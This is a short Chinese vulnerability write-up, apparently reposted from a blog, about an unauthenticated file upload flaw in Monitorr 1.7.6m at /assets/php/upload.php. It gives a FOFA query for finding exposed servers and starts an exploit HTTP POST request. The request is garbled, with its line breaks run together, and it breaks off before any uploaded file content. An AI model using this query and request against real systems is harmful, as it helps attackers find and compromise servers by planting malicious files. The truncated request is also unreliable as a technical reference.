本文共 547 字，大约阅读时间需要 1 分钟。

0x01 产品简介

Monitorr是一个实时显示任何网络应用程序或服务状态的网络前端。

0x02 漏洞概述

Monitorr 1.7.6m 版本中发现漏洞。它已被宣布为关键。受此漏洞影响的是组件服务配置的文件 /assets/php/upload.php 的未知功能。对参数 fileToUpload 的操作会导致不受限制的上传，未经身份验证的攻击者可远程上传恶意文件导致服务器失陷。

0x03 复现环境

FOFA：body="assets/php/timestamp.php"

0x04 漏洞复现

Exp

POST /assets/php/upload.php HTTP/1.1Host: your-ipUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_4)Accept-Encoding: gzip, deflateAccept: */*Connection: keep-aliveContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryMmx988TUuintqO4Q------WebKitFormBoundaryMmx988TUuintqO4QCo

转载地址：http://bpffk.baihongyu.com/